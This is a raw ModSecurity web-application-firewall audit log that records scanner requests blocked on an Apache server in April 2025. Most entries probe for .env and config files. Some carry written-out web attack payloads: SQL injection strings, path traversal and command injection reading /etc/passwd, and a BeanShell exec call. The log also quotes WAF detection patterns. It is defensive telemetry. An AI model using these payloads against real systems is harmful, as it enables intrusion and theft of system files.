aAMj8g6cTFSgLAHl7Ppq9AAAABI 103.236.140.4 35938 103.236.140.4 8181 --43efa325-B-- GET /nextjs-app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --43efa325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43efa325-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036274291485 752 (- - -) Stopwatch2: 1745036274291485 752; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43efa325-Z-- --0e0f2355-A-- [19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9QAAABU 103.236.140.4 35940 103.236.140.4 8181 --0e0f2355-B-- GET /node-api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --0e0f2355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e0f2355-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036275115163 790 (- - -) Stopwatch2: 1745036275115163 790; combined=345, p1=286, p2=0, p3=0, p4=0, p5=59, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e0f2355-Z-- --5d087948-A-- [19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9wAAABY 103.236.140.4 35946 103.236.140.4 8181 --5d087948-B-- GET /vendor/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --5d087948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d087948-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036275859093 779 (- - -) Stopwatch2: 1745036275859093 779; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d087948-Z-- --05c3c666-A-- [19/Apr/2025:11:17:57 +0700] aAMj9Q6cTFSgLAHl7Ppq-gAAAAA 103.236.140.4 35954 103.236.140.4 8181 --05c3c666-B-- GET /backend/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --05c3c666-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c3c666-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036277436827 697 (- - -) Stopwatch2: 1745036277436827 697; combined=281, p1=231, p2=0, p3=0, p4=0, p5=49, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c3c666-Z-- --2368250e-A-- [19/Apr/2025:11:17:58 +0700] aAMj9g6cTFSgLAHl7Ppq_gAAAAc 103.236.140.4 35966 103.236.140.4 8181 --2368250e-B-- GET /myproject/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --2368250e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2368250e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036278905937 673 (- - -) Stopwatch2: 1745036278905937 673; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2368250e-Z-- --a794e72d-A-- [19/Apr/2025:11:17:59 +0700] aAMj9w6cTFSgLAHl7PprAAAAAAs 103.236.140.4 35972 103.236.140.4 8181 --a794e72d-B-- GET /.envs/.production/.django HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a794e72d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a794e72d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036279971957 658 (- - -) Stopwatch2: 1745036279971957 658; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a794e72d-Z-- --4739ae4b-A-- [19/Apr/2025:11:18:00 +0700] aAMj-A6cTFSgLAHl7PprAgAAAA4 103.236.140.4 35978 103.236.140.4 8181 --4739ae4b-B-- GET /react-app/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --4739ae4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4739ae4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036280849855 802 (- - -) Stopwatch2: 1745036280849855 802; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4739ae4b-Z-- --b105f258-A-- [19/Apr/2025:11:18:01 +0700] aAMj-Q6cTFSgLAHl7PprAwAAAA8 103.236.140.4 35980 103.236.140.4 8181 --b105f258-B-- GET /react-app/.env.production HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 107.150.0.116 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 107.150.0.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --b105f258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b105f258-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745036281513364 1252 (- - -) Stopwatch2: 1745036281513364 1252; combined=506, p1=453, p2=0, p3=0, p4=0, p5=53, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b105f258-Z-- --3ae4ed2e-A-- [19/Apr/2025:11:46:51 +0700] aAMquw6cTFSgLAHl7PpsdAAAABQ 103.236.140.4 42490 103.236.140.4 8181 --3ae4ed2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62 Accept-Charset: utf-8 --3ae4ed2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae4ed2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745038011605525 734 (- - -) Stopwatch2: 1745038011605525 734; combined=312, p1=280, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae4ed2e-Z-- --b7f19d08-A-- [19/Apr/2025:13:05:33 +0700] aAM9LQ6cTFSgLAHl7PpyuQAAAAc 103.236.140.4 60712 103.236.140.4 8181 --b7f19d08-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 160.250.132.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.250.132.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b7f19d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7f19d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745042733476987 793 (- - -) Stopwatch2: 1745042733476987 793; combined=359, p1=311, p2=0, p3=0, p4=0, p5=48, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7f19d08-Z-- --42fa7445-A-- [19/Apr/2025:14:54:53 +0700] aANWzUruoUXZj665VUGk8QAAANQ 103.236.140.4 40560 103.236.140.4 8181 --42fa7445-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.62.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.62.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --42fa7445-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42fa7445-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745049293813539 747 (- - -) Stopwatch2: 1745049293813539 747; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42fa7445-Z-- --cde63e3a-A-- [19/Apr/2025:16:21:00 +0700] aANq_OvDiFC_ir7MDwbkCwAAAEw 103.236.140.4 53712 103.236.140.4 8181 --cde63e3a-B-- POST /guest_auth/guestIsUp.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: http Connection: close --cde63e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde63e3a-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745054460231354 850 (- - -) Stopwatch2: 1745054460231354 850; combined=355, p1=301, p2=0, p3=0, p4=0, p5=54, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde63e3a-Z-- --470bdf3d-A-- [19/Apr/2025:16:21:58 +0700] aANrNg6cTFSgLAHl7PrJ8gAAAAg 103.236.140.4 56626 103.236.140.4 8181 --470bdf3d-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:127.0) Gecko/20100101 Firefox/127.0 --470bdf3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --470bdf3d-E-- --470bdf3d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||103.236.140.4|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054518263346 5448 (- - -) Stopwatch2: 1745054518263346 5448; combined=3344, p1=654, p2=2635, p3=0, p4=0, p5=55, sr=158, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --470bdf3d-Z-- --dc4bd512-A-- [19/Apr/2025:16:22:00 +0700] aANrOOvDiFC_ir7MDwbkbAAAAFY 103.236.140.4 56738 103.236.140.4 8181 --dc4bd512-B-- POST /zentao/user-login.html HTTP/1.0 Referer: 103.236.140.4/zentao/user-login.html Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 72 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620 Content-Type: application/x-www-form-urlencoded --dc4bd512-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --dc4bd512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc4bd512-E-- --dc4bd512-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||103.236.140.4|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054520284410 2946 (- - -) Stopwatch2: 1745054520284410 2946; combined=1788, p1=410, p2=1344, p3=0, p4=0, p5=33, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc4bd512-Z-- --fd17a43c-A-- [19/Apr/2025:16:22:00 +0700] aANrOEruoUXZj665VUHoPAAAAMM 103.236.140.4 56740 103.236.140.4 8181 --fd17a43c-B-- GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 --fd17a43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd17a43c-E-- --fd17a43c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054520285911 1867 (- - -) Stopwatch2: 1745054520285911 1867; combined=604, p1=389, p2=188, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd17a43c-Z-- --77cc837c-A-- [19/Apr/2025:16:22:01 +0700] aANrOQ6cTFSgLAHl7PrJ-wAAAAU 103.236.140.4 56794 103.236.140.4 8181 --77cc837c-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 --77cc837c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77cc837c-E-- --77cc837c-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||103.236.140.4|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521252884 4160 (- - -) Stopwatch2: 1745054521252884 4160; combined=2544, p1=563, p2=1940, p3=0, p4=0, p5=41, sr=93, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77cc837c-Z-- --d11cab3b-A-- [19/Apr/2025:16:22:01 +0700] aANrOXNa4dA2HllpK_N98AAAAIw 103.236.140.4 56796 103.236.140.4 8181 --d11cab3b-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 25 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19 Content-Type: application/x-www-form-urlencoded --d11cab3b-C-- type='|cat /etc/passwd||' --d11cab3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d11cab3b-E-- --d11cab3b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521256166 1707 (- - -) Stopwatch2: 1745054521256166 1707; combined=647, p1=385, p2=229, p3=0, p4=0, p5=32, sr=107, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d11cab3b-Z-- --7ab03325-A-- [19/Apr/2025:16:22:01 +0700] aANrOevDiFC_ir7MDwbkcAAAAEw 103.236.140.4 56802 103.236.140.4 8181 --7ab03325-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close Content-Length: 58 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Content-Type: application/x-www-form-urlencoded --7ab03325-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --7ab03325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ab03325-E-- --7ab03325-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745054521326316 2074 (- - -) Stopwatch2: 1745054521326316 2074; combined=653, p1=431, p2=187, p3=0, p4=0, p5=35, sr=110, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ab03325-Z-- --9f29623f-A-- [19/Apr/2025:16:22:03 +0700] aANrO-vDiFC_ir7MDwbkdwAAAEE 103.236.140.4 56906 103.236.140.4 8181 --9f29623f-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.175.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.175.188 X-Forwarded-Proto: https Connection: close 